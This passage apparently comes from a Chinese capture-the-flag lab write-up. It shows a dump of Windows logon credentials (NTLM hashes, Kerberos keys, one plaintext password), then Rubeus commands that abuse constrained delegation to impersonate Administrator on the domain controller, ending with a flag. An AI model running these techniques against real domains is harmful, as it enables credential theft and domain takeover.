* Password : (p4Spnv`&9xTZ=D'D/lz[a:94O:$E!7&zfcMza9k;Se"&>cBCBU0bxw.xL"B>\GmtUT,<:q3Yxfq#`O3sLI;OK" (_T_T5- $zV]-i;)c$qIj&$RgttdZI"m
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : MSSQLSERVER$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-20
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : mssqlserver$
* Domain : XIAORANG.LAB
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 22617 (00000000:00005859)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/2/24 23:14:15
SID :
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 25360555 (00000000:0182f8ab)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/25 2:10:53
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 307424 (00000000:0004b0e0)
Session : Interactive from 1
User Name : William
Domain : XIAORANG
Logon Server : DC
Logon Time : 2025/2/24 23:14:55
SID : S-1-5-21-2704639352-1689326099-2164665914-1106
msv :
[00000003] Primary
* Username : William
* Domain : XIAORANG
* NTLM : 8853911fd59e8d0a82176e085a2157de
* SHA1 : e4fd18cfd47b9a77836c82283fb560e6f465bc40
* DPAPI : da3fc187c1ff105853ec62c10cddd26b
tspkg :
wdigest :
* Username : William
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : William
* Domain : XIAORANG.LAB
* Password : Willg1UoO6Jt
ssp :
credman :
Authentication Id : 0 ; 209398 (00000000:000331f6)
Session : Interactive from 0
User Name : MSSQLSERVER20
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1023
msv :
[00000003] Primary
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* NTLM : f5c512b9cb3052c5ad35e526d44ba85a
* SHA1 : b09c8d9463c494d36e1a4656c15af8e1a7e4568f
tspkg :
wdigest :
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 209200 (00000000:00033130)
Session : Interactive from 0
User Name : MSSQLSERVER18
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1021
msv :
[00000003] Primary
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* NTLM : 31de1b5e8995c7f91070f4a409599c50
* SHA1 : 070c0d12760e50812236b5717c75222a206aace8
tspkg :
wdigest :
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208981 (00000000:00033055)
Session : Interactive from 0
User Name : MSSQLSERVER16
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1019
msv :
[00000003] Primary
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* NTLM : 42c0eed1872923f6b60118d9711282a6
* SHA1 : dcf14b63c01e9d5a9d4d9c25d1b2eb6c65c2e3a6
tspkg :
wdigest :
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208768 (00000000:00032f80)
Session : Interactive from 0
User Name : MSSQLSERVER14
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1017
msv :
[00000003] Primary
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* NTLM : 7c8553b614055d945f8b8c3cf8eae789
* SHA1 : 1efdc2efed20ca503bdefea5aef8aa0ea04c257b
tspkg :
wdigest :
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208441 (00000000:00032e39)
Session : Interactive from 0
User Name : MSSQLSERVER10
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1013
msv :
[00000003] Primary
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* NTLM : c3e7aa593081ae1b210547da7d46819b
* SHA1 : 3bf20cfece021438cf86617f5cabc5e7a69038f7
tspkg :
wdigest :
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208350 (00000000:00032dde)
Session : Interactive from 0
User Name : MSSQLSERVER09
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1012
msv :
[00000003] Primary
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* NTLM : 2dd7fe93426175a9ff3fa928bcf0eb77
* SHA1 : a34c0482568fc9329f33ccdc1852fab9ef65bcd1
tspkg :
wdigest :
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208174 (00000000:00032d2e)
Session : Interactive from 0
User Name : MSSQLSERVER07
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1010
msv :
[00000003] Primary
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* NTLM : f9f990df1bc869cc205d2513b788a5b8
* SHA1 : 79746cfe5a2f1eec4350a6b64d87b01455ef9030
tspkg :
wdigest :
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 207945 (00000000:00032c49)
Session : Interactive from 0
User Name : MSSQLSERVER05
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1008
msv :
[00000003] Primary
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* NTLM : b552da4a7f732c40ca73c01dfaea7ebc
* SHA1 : 7f041a31e763eed45fb881c7f77831b888c3051d
tspkg :
wdigest :
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 207620 (00000000:00032b04)
Session : Interactive from 0
User Name : MSSQLSERVER02
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1005
msv :
[00000003] Primary
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* NTLM : 3aa518732551a136003ea41f9599a1ec
* SHA1 : 6f1ed1f677201d998667bd8e3b81cfb52b9a138a
tspkg :
wdigest :
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 207505 (00000000:00032a91)
Session : Interactive from 0
User Name : MSSQLSERVER01
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1004
msv :
[00000003] Primary
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* NTLM : ded5ad90b3d8560838a777039641c673
* SHA1 : a2cd9d2963f29b162847e8a1a2c19d5e0641a162
tspkg :
wdigest :
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 95411 (00000000:000174b3)
Session : Service from 0
User Name : SSASTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:32
SID : S-1-5-80-1549978933-2891762758-2075524219-3728768389-1145206490
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 93540 (00000000:00016d64)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 91986 (00000000:00016752)
Session : Service from 0
User Name : ReportServer
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63620 (00000000:0000f884)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : MSSQLSERVER$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/2/24 23:14:15
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : mssqlserver$
* Domain : XIAORANG.LAB
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :翻一翻可以看到MSSQLSERVER$这个用户,MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控,并且似乎只有他的NTLM哈希可用,我们用Rubeus申请访问自身的服务票据
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:7fa2072ba3c4eaf6713d45095efd01ef /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
抓到后注入票据
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3ihTh72FZzfLiNQaagMhKJU3VW6tsrVSnAoIU9Ao8Ud9cWtXosE4w+3377D/93aQZmlH8ZBYJTBP6SNaANHakY3HAsfOv9I2h4iDG/uxTZiaKjo4FFGjDMxHCQxjTGdTL6Fxm4ahEAKeaDTpmQoGqZ5lx1X+ZXBx3umaPQsPycx+aFof6T3wYet6i6hFRL31gSENo06Lc6Z72gGTK1UBfonZd+VYhMxD5RbBofCVHguGur/+/xFz4CDd/jd2ggit8QorS3QWeuGVaDQb8dxv1ky0ssrKmeGNlJa1oUS8sL2jjQdKVo2yNgJ3QHjPQRijdLDRE6sSeaGKMTwqmddUQjOFO8XeJjp+ET+udbXlj2ZctYD29PbkicFeOZUy5EM3hyfpF97+vbe+kREcqKPmA8rYwuW+nvT+tUVhpgmI9F2x1zySJNx46sZIHlK8K3Cn8/y2WJJeDpndYFaFmIzo/jrGF1Bd7OWhwvHTsXcUSGVcjwGa5Gy4qboEfoJiQvrgRNsn4yFccw7mVqUISr51kGuZv+VjXoEvIODbdc8J/WRQYle3CemDnO9biagEAzq2cguFPRs9+h+sE8mLiOGEg3BFtgVXCm4/rTo82AfBFNYOsJYK0FuDkKPTAlxvS5Ywu5Lxgso4+QoeKjyyfSx+A2r1Y/WJPj+5XzlCTICP5zRAvv1/WCzdgQbfYt4E5vA4+GndCJfuXb4CCTxAvgT8oNllym4KrrGNBD7mUa0PcJkBVJ1qGqVpgoWg3iUob5phn/VE+DbnwQTHA/BECEE6TCM2B5v8v77MhKKLkjglUK9zwXihG3z3QVQYLBknYy1ZvA71Xv2AW2O0KrZ6V3wDCeVuP34QOmBoes8eKBFfy3HMYIapGA8JXCDVIOmhOKd9ymUPeGjQAkWyD2wywAKgmUeDQ0TB6l+xqbB0Gnl71vjFqg+NenqeWv/zqD6pLbkEr1tvRm7jhwuN3M9ztZAf9fxvY6A3jpNHIxTzHny28pNTZglbBCwX6DlKyyC000puQJ+9y7/T0Ejwb8XZca925vOK+bfN+XA6+8NjW5kyACA3RGYIK5oBUIkQcOaZ6EsqWoSPNOI2lmmg6cUrddvRWTW/qcbeoD5hSLJaj8bxcW1jQyAkIfjAimnizRPx4w74oNMSHDxAee3AJfddR5xJtpnDvKZyFVnaoLPbZH5JrsRW5bvUuXbSn73v6hOK/fYaQ3yXCb/3v+KyjRlWlznxseKrUxHC9Tz9OouyMJLBI/u8+ngUVpm3CK3cVtR3jpGw9JOmCrDu1PfFYepkIvx658CP5XhGEOeJQr59wVoAXADId8VMtPMwsxDyl1OLxDzB/iuJ5BenyUBklO4Ina8oCsJJZJWLJCTzXOz9MZ3UPncjS8yyVkcpidc9T9LoXce7Lc1cyS56qmk3Uqttslds5UPcGT2sMDc/AzpZKonKj18ptQe0kyCwHp0zpcTVujgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBIOkEIW+fONWh+YR1fJV4DoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDIyNDE4MjQwNFqmERgPMjAyNTAyMjUwNDI0MDRapxEYDzIwMjUwMzAzMTgyNDA0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
于是拿到flag
flag04: flag{323be6d4-137b-4d8e-ad3e-f92f5ba469c6}